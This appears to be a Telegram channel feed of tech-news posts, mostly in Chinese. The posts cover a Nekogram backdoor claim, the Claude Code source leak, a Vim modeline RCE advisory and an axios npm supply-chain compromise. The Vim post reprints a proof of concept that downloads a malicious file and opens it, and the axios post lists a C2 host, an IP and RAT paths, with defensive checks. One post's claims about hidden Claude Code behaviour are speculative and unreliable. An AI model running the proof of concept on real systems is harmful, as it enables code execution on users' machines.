BREAKING: Nekogram is secretly transmitting your telegram account phone number to the developer

According to SOTA,
"The backdoor is hidden in the http://Extra.java file, which differs from the template uploaded to the repository. The obfuscated code sends data as an inline request to the @nekonotificationbot, leaving no trace. The same file implements account 'doxing' via several bots; it is possible that the leaked data is used to populate their databases."

Additionally, the creator of the Nekogram client, (presumably a Chinese national) was previously known for conducting DDoS attacks and unethical online behavior (including death threats against acquaintances).

Apparently, in the early versions of the client, de-anonymization was applied only to Chinese phone numbers, which could have been used for political surveillance;. However, it is now applied to all users.

Follow @TechLeaksZone

感谢火山引擎
https://x.com/openclaw/status/2039240359197438229

更刺激的是 https://github.com/anthropics/claude-code/pull/41447

GitHub

feat: open source claude code ✨ by gameroman · Pull Request #41447 · anthropics/claude-code

Claude Code is an agentic coding tool that lives in your terminal, understands your codebase, and helps you code faster by executing routine tasks, explaining complex code, and handling git workflows - all through natural language commands. - feat: open source…

什么 openclaw 都是小儿科，给我 instructkr/claude-code 擦皮鞋

全球首款双摄云台相机影石Nuna宣传片（待审核）

轻轻一扭，轻松拍出360°全景画面；搭配可拆卸镜头设计，随时转换第一视角；1200倍变焦+微距，不管是远在天边还是近在眼前，都能清晰捕捉；翻转屏秒变小风扇，炎炎夏日也要拍出“呼吸感”大片；同时支持手动发电，10分钟就能充至80%；内置带轮三脚架，一个人旅行也能全程跟拍，出门带它就够了！

这样的Nuna，你想试试吗？

@影石Insta360:

发布视频
播放量:8742 弹幕:166 评论:235
点赞:811 投币:195 收藏:139 转发:548
发布日期:2026-04-01 02:30:00
上传日期:2026-03-31 18:27:37
🔝> @影石Insta360:
【转发+关注】说说你最喜欢Nuna的哪个功能，5月1日抽1位朋友送69元购买新品的福利（我保证这句是认真的(°∀°)ﾉ）

via @bilifeedbot

2:27

Media is too big

VIEW IN TELEGRAM

Channel of ssr

Photo

DMCA速度一定要快：
https://github.com/github/dmca/blob/master/2026/03/2026-03-31-anthropic.md

哈哈哈哈，这简直是这 51.2 万行源码里最通人性也最“卑微”的代码

这段 negativePattern 暴露了 Anthropic 工程师在调教 Claude Code 时的三个核心策略：

1. “按闹分配”的止损逻辑：
当正则命中这些词（比如 wtf、piece of shit）时，系统会瞬间切换到一个 “高阶安抚模式”。它不再跟你争论逻辑，而是优先承认错误，并自动调用更强的 Opus 模型或开启更深的 CoT（思维链）来强行解决当前的 Bug，试图通过“超常表现”挽回用户的心。

2. AI 的“读心术”底层是正则：
大家觉得 Claude 懂人心，其实底层的“感知器”居然是这么一串脏话列表。这说明在极端的工程环境下，最原始的正则比复杂的情感分析模型更鲁棒、更省钱。

3. 防止模型“对骂”：
代码里还有一个配套的 SafeResponse 逻辑。一旦检测到用户抓狂，它会强制要求 AI 保持 “Extreme Professionalism（极端专业主义）”，绝对不允许 AI 回嘴。这就是为什么它有时候显得那么“温润如玉”——其实全是这几行正则给逼的！

Forgejo will be releasing a bug-fix patch release, along with incorporating upcoming Go security patches, on April 10th 2026. Patches will be available for Forgejo v11 LTS and Forgejo v14.

Details will be available in

v11.0.12
v14.0.4

https://codeberg.org/forgejo/security-announcements/issues/51

Codeberg.org

Forgejo v11.0.12 and v14.0.4

Forgejo will be releasing a bug-fix patch release, along with incorporating upcoming [Go security patches](https://groups.google.com/g/golang-announce/c/2UyQAnUQKwc), on April 10th 2026. Patches will be available for Forgejo v11 LTS and Forgejo v14.

Details…

今天啊，借着愚人节，也是咱们频道不知道第几个分数周年，跟大家说点心里话。

我们做内容这么久，翻遍了各类科技、生草账号，也一直在打磨自己的风格和调性。
慢慢地，我们就悟出来一个道理：真正能让人记住的内容IP，到最后永远都在做形式上的融合。
我也拜访了一些行业前辈，他们都说，好的内容表达、好的传播逻辑，到最后总是殊途同归、高度趋同的。

所以这次愚人节，我们借着睡服高管的机会，我就说，要不咱们试一试，把这些精髓全都揉在一起？
经过我们工程师的连夜攻关，历经多次标题打磨，再加上人工智能技术的深度赋能，在这个过程里我自己也一直在学习。说白了，内容圈跟科技圈一个道理，万变不离其宗，说到底，还是以换皮为本。

最终，这就是我们敲定的，全新的一个频道名，今天正式带给大家。

真我手机宣布正式接入OPPO售后体系
https://weibo.com/6617213711/5282469781181232

一加：请输入文本

HAT's Public Channel | 🫪

*-cli & *code: 感谢 claude code 大哥开源 🤜，马上开始新版本自研 src: https://www.npmjs.com/package/@anthropic-ai/claude-code/v/2.1.88?activeTab=code

Anthropic：我们刚刚开发出了网络安全领域最强的大模型Claude Mythos
把情报泄露在CMS上
把调试符号开源出来

*-cli & *code: 感谢 claude code 大哥开源 🤜，马上开始新版本自研

src: https://www.npmjs.com/package/@anthropic-ai/claude-code/v/2.1.88?activeTab=code

今天abc看了啥🤔

致CS新更新策划：

完美做了换弹版本更新的例行问卷，感兴趣的可以自己填一下：
https://surveys.pwesports.cn/survey/FCQzOa

vim存在rce，打开文件即可触发

https://github.com/vim/vim/security/advisories/GHSA-2gmj-rpqf-pxvh

poc

vim -version
# VIM - Vi IMproved 9.2 (2026 Feb 14, compiled Mar 25 2026 22:04:13)
wget https://raw.githubusercontent.com/califio/publications/refs/heads/main/MADBugs/vim-vs-emacs-vs-claude/vim.md
vim vim.md
cat /tmp/calif-vim-rce-poc

漏洞还是claude发现的，prompt只有一句话

Somebody told me there is an RCE 0-day when you open a file. Find it.

GitHub

Vim tabpanel modeline escape affects Vim > 9.1.1390 && Vim < 9.2.0272

Vim tabpanel modeline escape affects Vim > 9.1.1391 && Vim < 9.2.0272
===================================================
Date: 30.03.2026
Severity: High
CVE: *not-yet-assigned*
...

严重供应链攻击，axios 两个版本被投毒。

核心信息

| 项目         | 内容                                                                                              |
| ---------- | ----------------------------------------------------------------------------------------------- |
| 恶意版本       | axios@1.14.1 和 axios@0.30.4                                                                     |
| 攻击手法       | 劫持维护者 jasonsaayman 的 npm 账户，绕过 CI/CD 直接发布                                                       |
| 恶意依赖       | plain-crypto-js@4.2.1（伪装成 crypto-js，实际 drop RAT）                                                |
| C2 服务器     | sfrclak.com:8000 (IP: 142.11.206.73)                                                            |
| 平台 payload | macOS: /Library/Caches/com.apple.act.mond<br>Linux: /tmp/ld.py<br>Windows: %PROGRAMDATA%\wt.exe |

你需要做的

1. 立即检查

npm list axios 2>/dev/null | grep -E "1\.14\.1|0\.30\.4"
ls node_modules/plain-crypto-js 2>/dev/null && echo "⚠️ 中招"

2. 如果命中
• 降级到安全版本：[email protected] 或 [email protected]
• 系统已受陷 → 从干净状态重建，轮换所有凭证（npm token、AWS 密钥、SSH、云凭证）
• 检查 RAT 持久化文件（见上表路径）
3. CI/CD 加固

npm ci --ignore-scripts  # 禁止 postinstall 脚本
iptables -A OUTPUT -d 142.11.206.73 -j DROP  # 屏蔽 C2

axios 周下载量 3 亿+，影响范围极大。检查完你的项目和CI/CD流水线。

公益短信：警惕“谷圈”交易陷阱！购买二次元周边产品（俗称“谷子”）时，请理性消费、适度热爱，切勿因攀比或沉迷陷入诈骗陷阱。骗子常伪装卖家或拼单团长，以限量拼团预售、高价收谷、稀有低价售卖等名义，诱骗私下转账后卷款失联或发送假冒周边、虚假物流。警方对涉“谷圈”诈骗行为零容忍，将依法严厉打击！请广大青少年切勿轻信低价诱惑，拒绝私下联系转账，认准正规平台交易。【山东省反诈骗中心】